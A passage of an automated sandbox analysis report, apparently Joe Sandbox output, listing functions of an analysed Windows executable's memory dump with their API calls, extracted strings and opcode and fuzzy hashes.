FreeResource.KERNEL32(?,00948F58,00948F58,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 00402708

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
String ID:
API String ID: 4216414443-0
Opcode ID: fe55d16754670a1ac2242d55fbe1307306c78159f7c22dacc8df33dc46889b7d
Instruction ID: a74944ffd3112f9905740440eb7f37d3abcacb2d1106573319e1e0e6d7d597bb
Opcode Fuzzy Hash: fe55d16754670a1ac2242d55fbe1307306c78159f7c22dacc8df33dc46889b7d
Instruction Fuzzy Hash: 13F07471818305AFDB01AF61DD0196EBEA2FB98304F01883EF484611B1DB769828AB5A

Function 0040E950 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 698COMMONLIBRARYCODE

Download Yara Rule

Strings

D@A, xrefs: 0040F0CB

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID:
String ID: D@A
API String ID: 0-2037432845
Opcode ID: 82bbbdca95c55e60409104e81861719bc6b7877ec7bc15acddf14cefadc8757b
Instruction ID: 1e0778d192f5f23141dad884ed32409d8a0e2e34130d822a75cbeb00c40a84ce
Opcode Fuzzy Hash: 82bbbdca95c55e60409104e81861719bc6b7877ec7bc15acddf14cefadc8757b
Instruction Fuzzy Hash: BC428FB06047429FD714CF1AC58472ABBE1FF84304F148A3EE8589BB81D379E966CB95

Function 0040559A Relevance: 3.1, APIs: 2, Instructions: 128COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 004055BA

Part of subcall function 00405553: memset.MSVCRT ref: 00405562
Part of subcall function 00405553: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
Part of subcall function 00405553: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581

GetVersionExW.KERNEL32(?), ref: 00405619

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Version$AddressHandleModuleProcmemset
String ID:
API String ID: 3445250173-0
Opcode ID: f495203579311227c63983e5ddd909674dbe6439cabb42788c76bcb90ee03a16
Instruction ID: 9deb98d9ce9b1960b4761c85c685c0f6434d6ff4303ea967f2226934144b7de4
Opcode Fuzzy Hash: f495203579311227c63983e5ddd909674dbe6439cabb42788c76bcb90ee03a16
Instruction Fuzzy Hash: 72311F36E04E6583D6308A188C507A32294E7417A0FDA0F37EDDDB72D0D67F8D45AE8A

Function 00409930 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(004098F0,0040116F,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070,00000008), ref: 00409A6C
SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070,00000008,00000008), ref: 00409A80

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: be8703ea72731a37991eabb093e21ce865d6a3a52a87f86e162e98d40940aa29
Instruction ID: 9241775fbeca2ef236d22ba042fa6dd18ecd55e37cf60d082ab63f5987e9b773
Opcode Fuzzy Hash: be8703ea72731a37991eabb093e21ce865d6a3a52a87f86e162e98d40940aa29
Instruction Fuzzy Hash: CFE0A571208315EFC310CF10D888A867AB4B748741F02C43EA02992262EB348949DF1D

Function 0040B347 Relevance: 2.9, APIs: 1, Instructions: 1619COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 0040B359

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: e576844eda630fb24a4900eabb5141639e96436ababb831f4c7fee8327540495
Instruction ID: d2e712a387542d9911dc411e7765b1f2c08275ba07bac0dbf1d1b28710e8a60d
Opcode Fuzzy Hash: e576844eda630fb24a4900eabb5141639e96436ababb831f4c7fee8327540495
Instruction Fuzzy Hash: 13D23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86

Function 0040F3C8 Relevance: 2.1, Strings: 1, Instructions: 842COMMON

Download Yara Rule

Strings

xAA, xrefs: 0040FD28

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID:
String ID: xAA
API String ID: 0-1293610936
Opcode ID: 591c47f0151abaa23838d51f7b8325d4d390fbcd3a8530dac875949f81110dcc
Instruction ID: 3e0955324bacc98d649988aae549d3f33f39a3fcf449ebb2edb4fadec9577cf0
Opcode Fuzzy Hash: 591c47f0151abaa23838d51f7b8325d4d390fbcd3a8530dac875949f81110dcc
Instruction Fuzzy Hash: EF62AF71604B129FC718CF29C59066AB7E1FFC8304F144A3EE89597B80D778E919CB95

Function 00411580 Relevance: 1.6, Strings: 1, Instructions: 372COMMON

Download Yara Rule

Strings

xAA, xrefs: 00411933

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID:
String ID: xAA
API String ID: 0-1293610936
Opcode ID: 44050466ff59d092c84ade225eb2428a111c67205446c9fc6f6a12c7b28f2e65
Instruction ID: 97b3e1327a1e87a4b46b26d767485ea51a150d14d874054969dc66b926ead844
Opcode Fuzzy Hash: 44050466ff59d092c84ade225eb2428a111c67205446c9fc6f6a12c7b28f2e65
Instruction Fuzzy Hash: 5FD1E6716083818FC704DF28C49026ABBE2EFD9304F188A6EE9D587752D379D94ACB55

Function 00409950 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(004011C9,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 00409956

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: cf9cd527b89156cf826f8aca8c9aac0ae0f1dbb698b08308560a1dccda5bc85b
Instruction ID: bc48fdad81fd92ebd0be0b19d5c8e3ba934b166e7abd4bc921d629b17d7e6aca
Opcode Fuzzy Hash: cf9cd527b89156cf826f8aca8c9aac0ae0f1dbb698b08308560a1dccda5bc85b
Instruction Fuzzy Hash: 02B0017800422ADBDB019F10EC88BC83E72B749745F93C078E42981672EB79069EDA0C

Function 0040C898 Relevance: .7, Instructions: 674COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
Instruction ID: f4dcce38d5e2b5fea8365ab6f66f10a9b642d7e6e28dacc25e9c3ad87e991d79
Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
Instruction Fuzzy Hash: 3512C5B3B546144BD70CCE1DCCA23A9B2D3AFD4218B0E853DB48AD3341FA7DD9198685

Function 00410600 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c460358eba1917bb56d4065ee02bd871fc6c6cc725e64d99fb649ce963d7fe5
Instruction ID: fcc74630d9e7e7a990481c7c1f867b264d0775cdb04650b32c3420698d071277
Opcode Fuzzy Hash: 7c460358eba1917bb56d4065ee02bd871fc6c6cc725e64d99fb649ce963d7fe5
Instruction Fuzzy Hash: DE81E571620E52CBE718CF1DECD06B633A3E7C9320B49C638DA418779AC539E562D794

Function 004105E0 Relevance: .2, Instructions: 193COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513e02c80492a0d3023dc35d6953037e38dfbd2ea3f16a7153b47b8225a4960d
Instruction ID: 9051c99f30e4fd58257ce4a82e5c6de57c2f1ea08b849514de36b4a9f860707a
Opcode Fuzzy Hash: 513e02c80492a0d3023dc35d6953037e38dfbd2ea3f16a7153b47b8225a4960d
Instruction Fuzzy Hash: B571C3716205424BD724CF29FCD0A7633A2FBD9311B4BC73DDA4287296C238E962D694

Function 00410910 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
Instruction ID: e7601879cae5e26ed9c4f46374459fbcb7982be31dee43e66e8e889727de3951
Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
Instruction Fuzzy Hash: 384105736147054BF728CA28C8607EB7390AFD4304F49493FD89A87382C6F9E8C68689

Function 00410993 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
Instruction ID: c66b0092c88908efcb1f6d3c64bb4500893f1a226118266ab98ff54ab3bb9a2b
Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
Instruction Fuzzy Hash: B631D7726547054BE728C928C8A57EB7390BF94344F49493FC88A87382C6F9E9C6C289

Function 004109D9 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
Instruction ID: 9975ed08cb8d88c562da0411d9d676463dde2a9787c448613e09b1fe69d496df
Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
Instruction Fuzzy Hash: 0421C573754B054BE728896CC8953EB7390BFA4344F49493FC996873C1CAEAE9C5C284

Function 00408F69 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B

GetStockObject.GDI32(00000011), ref: 00408FB2
LoadIconW.USER32 ref: 00408FE9
LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
RegisterClassExW.USER32 ref: 00409021
IsWindowEnabled.USER32(00000000), ref: 00409048
EnableWindow.USER32(00000000), ref: 00409059
GetSystemMetrics.USER32(00000001), ref: 00409091
GetSystemMetrics.USER32(00000000), ref: 0040909E
CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
wcslen.MSVCRT ref: 00409189
wcslen.MSVCRT ref: 00409191
SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
SetForegroundWindow.USER32(00000000), ref: 0040921F
BringWindowToTop.USER32(00000000), ref: 00409226
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
TranslateMessage.USER32(?), ref: 00409259
DispatchMessageW.USER32(?), ref: 00409264
DestroyAcceleratorTable.USER32(00000000), ref: 00409278
wcslen.MSVCRT ref: 00409289
wcscpy.MSVCRT ref: 004092A1
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4

Strings

BUTTON, xrefs: 004091C6
0, xrefs: 00408FC5
STATIC, xrefs: 004090FB
EDIT, xrefs: 0040914D
D0A, xrefs: 00409003

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
String ID: 0$BUTTON$D0A$EDIT$STATIC
API String ID: 54849019-2968808370
Opcode ID: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
Instruction ID: 83f6c24ff00e7acae504a8cc9f4403d446bfccf5cce4438541287e2077ea33a9
Opcode Fuzzy Hash: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
Instruction Fuzzy Hash: 4E91A070648304BFE7219F64DC49F9B7FA9FB48B50F00893EF644A61E1CBB988448B59

Function 00401500 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401637

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 004057F0: wcsncmp.MSVCRT ref: 00405853
Part of subcall function 004057F0: memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(00940000,00000000,?), ref: 0040DEF9

Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(00940000,00000000,?,?), ref: 0040DF1C

Part of subcall function 0040A6C5: wcsncpy.MSVCRT ref: 0040A6E3
Part of subcall function 0040A6C5: wcslen.MSVCRT ref: 0040A6F5
Part of subcall function 0040A6C5: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A735

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

Strings

fpA, xrefs: 0040158A
fpA, xrefs: 00401590, 004015C7, 004015D1, 004015E3, 004015CB, 004015D5, 004015DD, 004015E7
2pA, xrefs: 0040169B
fpA, xrefs: 004018F7
fpA, xrefs: 004015ED
6pA, xrefs: 004017CD
&pA, xrefs: 0040154F
2pA, xrefs: 004016C5
2pA, xrefs: 004016F3
fpA, xrefs: 00401835
6pA, xrefs: 00401861
6pA, xrefs: 00401784
.pA, xrefs: 0040167C
$pA, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$fpA$fpA$fpA$fpA$fpA
API String ID: 1295435411-3159487945
Opcode ID: d3a3a63bc2a0b99ba5975a07e2b9f90fb8c3599d1eca8c8031e60196fdd81d10
Instruction ID: b4e4a0b709d291d116e2253cfe1eb4aef96e8d0e4325569d50da54c09323f468
Opcode Fuzzy Hash: d3a3a63bc2a0b99ba5975a07e2b9f90fb8c3599d1eca8c8031e60196fdd81d10
Instruction Fuzzy Hash: E3B134B1504300AED600BBA1DD81E7F77A9EB88308F108D3FF544B61A2CA3DDD59966D

Function 00409355 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116libraryloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00409373

Part of subcall function 0040E3F0: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E3FA

memset.MSVCRT ref: 00409381
LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
wcsncpy.MSVCRT ref: 004093DD
wcslen.MSVCRT ref: 004093F1
CoTaskMemFree.OLE32(?), ref: 0040947A
wcslen.MSVCRT ref: 00409481
FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0

Strings

SHBrowseForFolderW, xrefs: 004093AA
SHELL32.DLL, xrefs: 00409389
SHGetPathFromIDListW, xrefs: 004093B2
$0A, xrefs: 004093CD
P, xrefs: 00409429

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
API String ID: 4193992262-92458654
Opcode ID: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
Instruction ID: 23f57ca1c929181bfbc58391faabb4ebc57556df945843c0c8e437b0019b5ca4
Opcode Fuzzy Hash: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
Instruction Fuzzy Hash: D3416471508704AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B6A

Function 00406310 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275COMMON

Download Yara Rule

APIs

wcsncpy.MSVCRT ref: 00406405

Part of subcall function 0040E1E0: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E1EA

_wcsdup.MSVCRT ref: 0040644E
_wcsdup.MSVCRT ref: 00406469
_wcsdup.MSVCRT ref: 0040648C
wcsncpy.MSVCRT ref: 00406578
free.MSVCRT ref: 004065DC
free.MSVCRT ref: 004065EF
free.MSVCRT ref: 00406602
wcsncpy.MSVCRT ref: 0040662E

Strings

$0A, xrefs: 0040631F
$0A, xrefs: 0040633E
$0A, xrefs: 0040632F

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: _wcsdupfreewcsncpy$Value
String ID: $0A$$0A$$0A
API String ID: 1554701960-360074770
Opcode ID: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
Instruction ID: a3954b37eea6ac6c251c7ba509b6f2d99b081bbe67bc4aeebc7e0be9c04ba548
Opcode Fuzzy Hash: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
Instruction Fuzzy Hash: 30A1BD715043019BCB209F18C881A2BB7F1EF94348F49093EF88667391E77AD965CB9A

Function 00412082 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON

